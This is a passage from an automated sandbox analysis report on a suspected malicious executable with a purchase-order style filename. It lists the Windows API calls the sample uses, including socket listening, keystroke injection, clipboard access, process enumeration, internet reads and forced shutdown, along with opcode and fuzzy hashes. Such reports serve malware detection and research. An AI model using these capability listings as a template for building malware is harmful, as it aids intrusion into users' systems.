                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                        • String ID:
                        • API String ID: 1240663315-0
                        • Opcode ID: 4e61ef80cc37c2239883a1209231fd2e83c295b5332ddc2238a8490e215fcfe0
                        • Instruction ID: 4296cde7cdf8774756940bd2cbf4ea4b9a9c7c3a30cd459cf87f3d1136405a37
                        • Opcode Fuzzy Hash: 4e61ef80cc37c2239883a1209231fd2e83c295b5332ddc2238a8490e215fcfe0
                        • Instruction Fuzzy Hash: B1E17B31214200AFCB19DF25C881EAABBE9EF88764F04896DF45ADB261DB30ED55CF51
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: 603aeea04d2d4b023c71023d2976df99fb85f64c0dbd07b61206429eb81413c4
                        • Instruction ID: 219e6e62bded50b0ebaafc367ec63f42d5fcaa1a0868da6db5954d16ef8a0ec4
                        • Opcode Fuzzy Hash: 603aeea04d2d4b023c71023d2976df99fb85f64c0dbd07b61206429eb81413c4
                        • Instruction Fuzzy Hash: 7A21D331614110AFD712AF24EC5AB6EB7ACEF04710F008019F909DB2A1DB30ED51CF90
                        APIs
                          • Part of subcall function 002EA857: CLSIDFromProgID.OLE32 ref: 002EA874
                          • Part of subcall function 002EA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 002EA88F
                          • Part of subcall function 002EA857: lstrcmpiW.KERNEL32(?,00000000), ref: 002EA89D
                          • Part of subcall function 002EA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002EA8AD
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0030C6AD
                        • _memset.LIBCMT ref: 0030C6BA
                        • _memset.LIBCMT ref: 0030C7D8
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0030C804
                        • CoTaskMemFree.OLE32(?), ref: 0030C80F
                        Strings
                        • NULL Pointer assignment, xrefs: 0030C85D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 1300414916-2785691316
                        • Opcode ID: 524b67f2e4edebe3bdb1389e4386277f8cd977aec97a779bf1a93092195702d1
                        • Instruction ID: 439c43d912d37864f7552c9b6133af0012e50fda718c4e80d3d36c51111a335a
                        • Opcode Fuzzy Hash: 524b67f2e4edebe3bdb1389e4386277f8cd977aec97a779bf1a93092195702d1
                        • Instruction Fuzzy Hash: 26916A71D11218AFDB11DFA0DC90EDEBBB9EF08750F20816AF519A7281EB705A54CFA0
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003024F6
                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00302526
                        • _wcscmp.LIBCMT ref: 0030253A
                        • _wcscmp.LIBCMT ref: 00302555
                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003025F3
                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00302609
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                        • String ID: *.*
                        • API String ID: 713712311-438819550
                        • Opcode ID: 007d1f6630b3b9268ef4675f9927cdd9865f8ac3d38b6d8f050a2411145b2b1d
                        • Instruction ID: a11766a4dfa555c61c5f99b24a5f3a4e1b5269d9fa329df730e88639bb0adf43
                        • Opcode Fuzzy Hash: 007d1f6630b3b9268ef4675f9927cdd9865f8ac3d38b6d8f050a2411145b2b1d
                        • Instruction Fuzzy Hash: EA417D7190121AAFCF16DFA4CC99AEFBBB8FF05310F204456E815A61D1E7719A54CF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 093cc5856021b35fed208d9686db80a54fb45d1c35d16381bfbf55b1f3ae0467
                        • Instruction ID: 3ed4e568f17d40d4e3848edb8f76ee617d1440a58e65ea7bc64bb41c1b74e310
                        • Opcode Fuzzy Hash: 093cc5856021b35fed208d9686db80a54fb45d1c35d16381bfbf55b1f3ae0467
                        • Instruction Fuzzy Hash: E3929B71E2021ACBDF25CF68C8807EDB7B1BB54354F1585AAE91AAB280D7709DD1CF90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: dd919f30bc902aaf2c3a0abf57011cd3e31f26060f2ff9832eaf31b5ea15f6c9
                        • Instruction ID: 9662ef5407df32b1fb4561a635b728ea10a6a0232bf8bf0681ea65fddfba689d
                        • Opcode Fuzzy Hash: dd919f30bc902aaf2c3a0abf57011cd3e31f26060f2ff9832eaf31b5ea15f6c9
                        • Instruction Fuzzy Hash: F7127D70A10619EFDF04DFA5D981AEEB7F9FF48340F204569E80AE7251EB35A921CB50
                        APIs
                          • Part of subcall function 002EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002EBF0F
                          • Part of subcall function 002EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002EBF3C
                          • Part of subcall function 002EBEC3: GetLastError.KERNEL32 ref: 002EBF49
                        • ExitWindowsEx.USER32(?,00000000), ref: 002F830C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $@$SeShutdownPrivilege
                        • API String ID: 2234035333-194228
                        • Opcode ID: d71b92f480860f7a803829ec4faaf1229b463e1fc26e04684c8d75e5af149134
                        • Instruction ID: c57708aec69c9046a59afed143600b98b801176e96be3e04cb41eb7feb469148
                        • Opcode Fuzzy Hash: d71b92f480860f7a803829ec4faaf1229b463e1fc26e04684c8d75e5af149134
                        • Instruction Fuzzy Hash: A3018871B7431AAAF7695A689C8BBBBF25CDB00BC0F140474FB43D21E1DE909C2086A4
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00309235
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309244
                        • bind.WSOCK32(00000000,?,00000010), ref: 00309260
                        • listen.WSOCK32(00000000,00000005), ref: 0030926F
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309289
                        • closesocket.WSOCK32(00000000,00000000), ref: 0030929D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketlistensocket
                        • String ID:
                        • API String ID: 1279440585-0
                        • Opcode ID: 76c2b95a8e0ea7c1736365267ff25d7d4260112255ac3e0ce8d712b56bc9e254
                        • Instruction ID: 84b0821eaa8efea4eb752462d628ac0b3a5f286f33d7253ad70991c60d1bfcc4
                        • Opcode Fuzzy Hash: 76c2b95a8e0ea7c1736365267ff25d7d4260112255ac3e0ce8d712b56bc9e254
                        • Instruction Fuzzy Hash: 0221EC35600204AFCB12EF64DC95B6EB7ADAF84320F11855AF916AB3E2CB30AD41CB51
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002F6F7D
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002F6F8D
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 002F6FAC
                        • __wsplitpath.LIBCMT ref: 002F6FD0
                        • _wcscat.LIBCMT ref: 002F6FE3
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002F7022
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                        • String ID:
                        • API String ID: 1605983538-0
                        • Opcode ID: d6bbd5042d3c60cd681322ae2d0785ef7dcfd81f479d27e6edbe05124d95ba0d
                        • Instruction ID: 2553ae1abc9e9833b50a5d1ab46a7fe9b9d134abfe15c62690669cacb42d57d8
                        • Opcode Fuzzy Hash: d6bbd5042d3c60cd681322ae2d0785ef7dcfd81f479d27e6edbe05124d95ba0d
                        • Instruction Fuzzy Hash: 16218371914219ABDB11AFA0DC88BEEB7BCAF08340F1004A9F605D3141EBB19F94CB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: hN6$tM6
                        • API String ID: 4104443479-3368265714
                        • Opcode ID: f8bf22219e144f6be29c0bb0b457e71b926c37ffc7037611c6cc7d9c6cc1644c
                        • Instruction ID: d92b5a75576bc911605bc419b92e4d5e008cb95d29735a13f43911186f0d6cfd
                        • Opcode Fuzzy Hash: f8bf22219e144f6be29c0bb0b457e71b926c37ffc7037611c6cc7d9c6cc1644c
                        • Instruction Fuzzy Hash: D7A27874E10219CFCB29CF58C8846EDBBB1FF48354F2581AAE859AB390D7749D91CB90
                        APIs
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                        • _memmove.LIBCMT ref: 00323020
                        • _memmove.LIBCMT ref: 00323135
                        • _memmove.LIBCMT ref: 003231DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                        • String ID:
                        • API String ID: 1300846289-0
                        • Opcode ID: 5042277e12a4fd3dc7404d3c464aeba66c18d6df0135a007120a0eebe63f1e5e
                        • Instruction ID: ad289b3f8f4ec6f58cd20e2a4383c4d839a6795fea147092e8b842d0e36ce060
                        • Opcode Fuzzy Hash: 5042277e12a4fd3dc7404d3c464aeba66c18d6df0135a007120a0eebe63f1e5e
                        • Instruction Fuzzy Hash: 0202B170A10205EFCF05DF68D981AAEB7B9EF48340F15C069E80ADB255EB35DE25CB91
                        APIs
                          • Part of subcall function 0030ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0030ACF5
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0030973D
                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00309760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastinet_addrsocket
                        • String ID:
                        • API String ID: 4170576061-0
                        • Opcode ID: cebba70ead24cef38e8cb53c205d84343f800291a9ebdfb804a7b5eff0a05872
                        • Instruction ID: 1c18a9da4245c71791867b174c08af44173536559da44521ebecf68a3e17f646
                        • Opcode Fuzzy Hash: cebba70ead24cef38e8cb53c205d84343f800291a9ebdfb804a7b5eff0a05872
                        • Instruction Fuzzy Hash: 2741EF70620204AFDB14AF28CC82FAEB3EDEF44764F14815DF956AB3D2CA749D118B91
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 002FF37A
                        • _wcscmp.LIBCMT ref: 002FF3AA
                        • _wcscmp.LIBCMT ref: 002FF3BF
                        • FindNextFileW.KERNEL32(00000000,?), ref: 002FF3D0
                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002FF3FE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNext
                        • String ID:
                        • API String ID: 2387731787-0
                        • Opcode ID: 550ccef54929479d9aaa0582da955e2659dde240644b5f0dc7f10717a6192500
                        • Instruction ID: 1271021c02b13fb7d370e02bbc1f96ede79d1c4c3d9517217176ff38d73dd460
                        • Opcode Fuzzy Hash: 550ccef54929479d9aaa0582da955e2659dde240644b5f0dc7f10717a6192500
                        • Instruction Fuzzy Hash: ED41AF356143029FC718DF28C490EAAB3E8FF49324F10426DEA59CB3A1DB71A965CF91
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003120EC,?,003122E0), ref: 00312104
                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00312116
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetProcessId$kernel32.dll
                        • API String ID: 2574300362-399901964
                        • Opcode ID: 3660c4dd2913ead43b4126731169a289bd2dac911907de401c0be8ceaee0fecf
                        • Instruction ID: ee561f0d13429f6abeed401d342585d544c7022fef0d66f7ca62e710ef0f11da
                        • Opcode Fuzzy Hash: 3660c4dd2913ead43b4126731169a289bd2dac911907de401c0be8ceaee0fecf
                        • Instruction Fuzzy Hash: 1BD0A734D007129FD7239F71F84D68336D8AB18300F018439E68BD1158D770C4D0CA50
                        APIs
                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002F439C
                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 002F43B8
                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002F4425
                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 002F4483
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: d0f9cda9717cce25638c1d50bfc218f3df37f135febaa54fe969b7059a9c5714
                        • Instruction ID: 134b4c863589fbca70f86f3f96c82a5bf4d22738dde2ece437a09b172c6b29ae
                        • Opcode Fuzzy Hash: d0f9cda9717cce25638c1d50bfc218f3df37f135febaa54fe969b7059a9c5714
                        • Instruction Fuzzy Hash: 86411B7092024D9AEF21AF64D8447FFFBB56B45391F04017AF681A22C1C7F489659B71
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002F221E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: cd96d70e77ccaf5e0eb6fbfce65d90070252cbb69b07800bee3363f97222dd67
                        • Instruction ID: 382fc8c5882132c89b073199622f98dbd4721cf80c4b7d45005042dbf91229c5
                        • Opcode Fuzzy Hash: cd96d70e77ccaf5e0eb6fbfce65d90070252cbb69b07800bee3363f97222dd67
                        • Instruction Fuzzy Hash: 90321275A10609DFC728CF69C480A6AF7F0FF48360B11C46EE99ADB3A1E770A951CB44
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 002CAE5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LongProcWindow
                        • String ID:
                        • API String ID: 3265722593-0
                        • Opcode ID: 4b5595c57d5f0b8b66f3b9f271b6d0153292cab6022188f02784a35230424a01
                        • Instruction ID: 54b0041f6f8e286339653c6cac7635079db7c7fd284e0c3c6b44ff1c93e4383b
                        • Opcode Fuzzy Hash: 4b5595c57d5f0b8b66f3b9f271b6d0153292cab6022188f02784a35230424a01
                        • Instruction Fuzzy Hash: 05A1497413421DBEDB3AAE295C88FBF396CEB46348B11473DF502D6192CA658C6193B3
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00304A1E,00000000), ref: 003055FD
                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00305629
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Internet$AvailableDataFileQueryRead
                        • String ID:
                        • API String ID: 599397726-0
                        • Opcode ID: 2cb560cd96ff8217d4bb898ecb8ba708febaa1dd85788583d897a1d21766ae04
                        • Instruction ID: f3eda404d43ce45f21665ca811812ed19b36a534eaebb6d394c5aa224c990bf3
                        • Opcode Fuzzy Hash: 2cb560cd96ff8217d4bb898ecb8ba708febaa1dd85788583d897a1d21766ae04
                        • Instruction Fuzzy Hash: 4D411571601A09FFEB129E94DCA5FBFB7BDEB41318F10401AF606A61C0DA719E409F64
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FEA95
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002FEAEF
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002FEB3C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
